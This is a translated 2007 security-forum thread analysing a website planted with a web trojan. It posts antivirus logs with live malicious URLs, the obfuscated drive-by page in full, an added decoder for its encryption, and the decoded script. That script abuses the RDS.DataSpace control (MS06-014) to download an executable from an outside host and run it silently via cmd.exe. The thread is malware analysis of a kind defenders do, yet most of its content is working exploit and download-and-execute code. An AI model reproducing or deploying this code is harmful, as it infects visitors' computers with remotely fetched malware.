Thread starter: audion

[Virus sample] 东方卫士 website planted with a web trojan

The EQs
Posted on 2007-6-14 11:12:48
Time        Module        Object        Name        Threat        Action        User        Information
2007-6-14 11:15:06        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\N7HJWTDR\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        quarantined - deleted - error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred on a new file created by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe. The file was moved to quarantine. You may close this window.
2007-6-14 11:15:06        IMON        file        http://mm.987999.com/mm/YuiAnLQvZx.jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:15:03        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\N7HJWTDR\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred at an attempt to access the file by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe.
2007-6-14 11:15:00        IMON        file        http://www.69642.cn/wm/69642.bmp        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:14:59        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\M1D3KQEB\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        quarantined - deleted - error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred on a new file created by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe. The file was moved to quarantine. You may close this window.
2007-6-14 11:14:58        IMON        file        http://www.69642.cn/wm/69642.bmp        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:14:57        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\M1D3KQEB\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred at an attempt to access the file by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe.
小邪邪
Posted on 2007-6-14 11:13:07
咖啡 (Kaspersky) kills a whole basketful of them
mofunzone
Posted on 2007-6-14 11:17:48
Originally posted by solcroft on 2007-6-13 15:27
The script isn't encrypted; the web trojan's address is plainly visible
http://mm.987999.com/soft.exe

Looks like you didn't find the real culprit
Or rather, Rising caught the decrypted stuff
Anyone interested can decode it themselves
Off to do homework; biology is a pain..
File: b.htm
Status: INFECTED/MALWARE
MD5: e9e20f117d2aa34a1a39c35944e845ca
Packers detected: -
Scanner results (scan taken on 14 Jun 2007 03:18:54 (GMT)):
A-Squared: Found nothing
AntiVir: Found nothing
ArcaVir: Found nothing
Avast: Found nothing
AVG Antivirus: Found nothing
BitDefender: Found nothing
ClamAV: Found nothing
Dr.Web: Found nothing
F-Prot Antivirus: Found nothing
F-Secure Anti-Virus: Found nothing
Fortinet: Found nothing
Kaspersky Anti-Virus: Found nothing
NOD32: Found nothing
Norman Virus Control: Found nothing
Panda Antivirus: Found nothing
Rising Antivirus: Found nothing
VirusBuster: Found JS.Dropperapp.A
VBA32: Found nothing

  1. <html><head><script>eval(unescape('%66%75%6E%63%74%69%6F%6E%20%6D%28%73%29%7B%76%61%72%20%63%2C%6E%2C%7A%2C%69%3B%7A%3D%27%27%3B%69%3D%30%3B%77%68%69%6C%65%28%69%3C%73%2E%6C%65%6E%67%74%68%29%7B%63%3D%73%2E%63%68%61%72%41%74%28%69%29%3B%20%69%66%28%27%75%27%3D%3D%63%29%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%32%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%33%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%34%29%3B%6E%3D%35%3B%7D%20%65%6C%73%65%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%6E%3D%32%3B%7D%7A%2B%3D%63%3B%69%3D%69%2B%6E%3B%7D%72%65%74%75%72%6E%20%7A%3B%7D%20%66%75%6E%63%74%69%6F%6E%20%65%28%73%29%7B%72%65%74%75%72%6E%20%75%6E%65%73%63%61%70%65%28%6D%28%73%29%29%3B%7D'));eval(e('66756E6374696F6E2064286F73297B766172206B65793D227765626965223B7661722064733B64733D27273B766172206B702C73702C732C6B632C73633B206B703D303B73703D303B7768696C652873703C6F732E6C656E677468297B73633D206F732E63686172436F64654174287370293B6B633D6B65792E63686172436F64654174286B70293B20696628282873635E6B63293D3D3339297C7C282873635E6B63293D3D3932297C7C282873635E6B63293C3332297C7C282873635E6B63293E3132362929207B733D537472696E672E66726F6D43686172436F6465287363293B7D656C73657B733D537472696E672E66726F6D43686172436F6465282873635E6B6329293B7D2064732B3D733B6B702B2B3B73702B2B3B6966286B703E3D6B65792E6C656E677468296B703D303B7D72657475726E2064733B7D2066756E6374696F6E2064692873297B733D642873293B646F63756D656E742E777269746528756E657363617065286D28732929293B7D'));/*EncryptHTML*/</script><script Language='JavaScript'>di('D&UZSDRP_9@UU]WGS!_TA T^RBSS_RAPQ-S6SS^SATUZSDRP_9@UU]V2U&Y$ASU5S2SQ^QA9T/S2WR_RA PQS2W[^B@STXREWR_ @PT-SESW^WEUQ-WGQ&_T@QTQW2RP_TA T]S1S&[]E9P(S2V ^WAPU]RBRP_ EUV-SFRV_]E U[S1RW_ AQPQS2RW_!AWT5REW[[BERP,SBRZ_PERQ+R3RV^W@9R-U6R _TATTXV3WP_#AWT(WEV 
Y!G$T[SESPZ!EWT5SDRV[WDBR-U6SQ_VAVQ-WEQS_QA#T]SEWE[WDBR-U6SV_QAQQ-WEPQ^Q@WT5SFS&[WDBR-U6SW_PAPQ-WEQ&_9AVU[S1RQ_#ASU]W2WPZBG!R(SAST_SD!P[POQ&]&C]W]PCPR[WDBR-U6S!_$D!P^SORV^Q@UQ(W1W$^RAPT[W2ST^WAPT5R@SW_WA]U]S3WE_VA#T-W1RQ_#ASU]W2SW^]APP^V5WRY!G$U_SFRP[UAQT_V3SV_#AVU5S3SW_ @QP,SDRP_PATU]SBQW_&APT-SBSE^QE]TXSFSS[BAWT[SEW[ZBEUR-U6SV_SE UZSBRV]T@QU]RES[_W@PU]SBWZ[WAVT*SFRQ^VA9T]WEW![WAVT*RDS[_QD$V[QCV[ZSCVQ5VBVT[!DSQ5QFVQ[!DTQXQCVR[!D9QQVDQS[!DUQYQDVRZQCSVZVEV[]PDVQ_WEW[ZBEUR-U6RT_T@WPYROV&_QASP,QDRP_PATU]SBQ$_WA$T5SDRV[]APT5SBW _SAST_W4WP[WE9Q+WGU&Y$@STXREWR5VD!T]SAWE]V@WT5SFRV_PC#T[S6SW_V@QPQSDSQ_VEBT]SCSV[&EWP[WNV [UG!R(PDWE^Q@9UYSBV&ZTDBPYU3U#^]E T/RGSW_ E]P[Q@QW5QEWP*WGS!_$E&QYWNV [UG!R(ROWE^VAPT,SCWZ[9DBPYS3R#ZTD!T^S2WZZTDUQYVGW[ZBEUR-U6RT_T@WPYQAV&_QASP,QDRP_PATU]SBQ$_WA$T5SDRV[]EWWZSDRP_9@UU]SNSE_RE V_SNS!_PBVUPRDRV_PA!V/SES#_PAVU]WEW![WEWPPV5U&Y$@STXREWR^QA!UYV3QT[ CRT5RCPQ^UAPTZSNSS_&CST/S4SV_P@WPQVGW[ZB@STXREWR^QDWQ+U3U#^QDWQ-QAWE]W@PTPS4SV5UATU]SOWZ^QA!UYW4WP^WA9UZSNSE_REWP+S3R#ZTE9Q+U3U#_!@$QXV3WR]SE V[RBS[_&AQWYSFRV_]E]U]S3RR[&A!U(VFW[ZBBVP,Q1RR_PA PQWNV Y!G$WZW2PU^WA9U]SBWZ^]E U[SBRQ^UA#T,RDSW]WA#T]RNW[ZBG!R(PDWE5VATU_SBPV_#CSTPS4SW[]A!U(VFW!ZWE9Q+U3U#5VE VZS4S$^VAPPQWNV Y!G$V_W2Q&_#@ST5QAS[_&APPQS3R#ZTE&U]VEW[ZBG!R(RASS^WEUWXV3SV_SE VZRESW_T@QT5Q1SP_$APTZRCWZ[WBVTQSBS!_&E VXRGRR_&A9TZSFRV_9A#T,WEW![WEWPPV5U&Y$APUQRGVSZ!CSP,QERW_9A&T]PGSS^QA]PQRCS&^UEBP^P4P!^V@9UZRCSW_!DVQ[W@W![RAVT-SCWE_P@]T5W@W[ZBG!R(PFWE5VA]T5S4S!]P@]T5SDRW^QAPPQSBRZ^UDTP*W@WR[#AVPYW@W ^QDWP*WEWP[&EWT/RGSW_ EWP*VGW[ZB@!TZSFRV_VA]PQSNW[^BA9Q-VFV ^!G!R(V4W$^VAVU[SNRR^QD PYWG');</script></head></html><Script language="Javascript" src="b.js"></Script>
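To read the di('...') payload in b.htm above without running it, here is an added decoder that is not code from the thread; it reimplements the sample's own d(), m() and unescape() steps, with the key "webie" taken from the hex-encoded second script on the page. hexTokensToText() on its own also decodes the hex string passed to e() in that first script, which is where d() itself is hidden.

```javascript
// Added example, not code from the thread: decodes the "EncryptHTML" layer of
// b.htm without running the sample's own eval() or document.write().
// Its d() XORs the di('...') argument with the repeating key "webie", leaving a
// character untouched when the XOR result would be ' or \ or a control/non-ASCII
// byte; its m() restores the '%' signs of a hex-escaped string ("XX" -> "%XX",
// "uXXXX" -> "%uXXXX"); unescape() then yields the hidden HTML.

// Stage 1: the sample's d(), rewritten without eval.
function xorDecode(cipher, key) {
  let out = "";
  for (let i = 0; i < cipher.length; i++) {
    const sc = cipher.charCodeAt(i);
    const kc = key.charCodeAt(i % key.length);
    const x = sc ^ kc;
    // same skip rule as the sample: these positions were never XORed
    const keep = x === 39 || x === 92 || x < 32 || x > 126;
    out += String.fromCharCode(keep ? sc : x);
  }
  return out;
}

// Stages 2 and 3: the sample's m() plus unescape() in one pass over a run of
// "XX" / "uXXXX" tokens whose '%' signs were stripped.
function hexTokensToText(s) {
  let out = "";
  let i = 0;
  while (i < s.length) {
    if (s[i] === "u") {               // %uXXXX: one UTF-16 code unit
      out += String.fromCharCode(parseInt(s.slice(i + 1, i + 5), 16));
      i += 5;
    } else {                          // %XX: one byte
      out += String.fromCharCode(parseInt(s.slice(i, i + 2), 16));
      i += 2;
    }
  }
  return out;
}

// Full pipeline for one di('...') argument.
function decryptHtml(cipher, key = "webie") {
  return hexTokensToText(xorDecode(cipher, key));
}

// The first 34 characters of the di('...') argument posted above.
const SAMPLE = "D&UZSDRP_9@UU]WGS!_TA T^RBSS_RAPQ-";
console.log(decryptHtml(SAMPLE));   // <script language=
```

Note the skip rule matters even this early: the tenth character '9' is kept as-is because '9' XOR 'e' would give a backslash.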
dikex
Posted on 2007-6-14 12:09:55
The main encrypted part, decoded:

<SCRIPT language=javascript>
// gn(): random numeric file name for the dropped executable
function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}
try
{
// object names are split into fragments so that plain string signatures miss them
aaa="obj";
bbb="ect";
ccc="Adodb.";
ddd="Stream";
eee="Microsoft.";
fff="XMLHTTP";
lj='http://web.freewebhtm.com/soft.exe';
var df=document.createElement(aaa+bbb);
// RDS.DataSpace (the MDAC control patched by MS06-014): its CreateObject lets the
// page instantiate COM objects that browser script is normally not allowed to touch
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee+fff,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
// fetch soft.exe, save it under the Windows folder (GetSpecialFolder(0)),
// rename it to rising<N>.exe and launch it through cmd.exe
x.open("GET", lj,0);
x.send(); mz1=gn(1000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0);var t2;
t2=F.BuildPath(tmp,"rising"+mz1);
mz1= F.BuildPath(tmp,mz1);S.Open();
S.Write(x.responseBody);
S.SaveToFile(mz1,2);
S.Close();
F.MoveFile(mz1,t2);
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\system32','cmd.exe');
Q.ShellExecute(exp1,' /c '+t2,"","open",0);}catch(i){i=1;}
</SCRIPT>
sums2001
Posted on 2007-6-14 12:27:09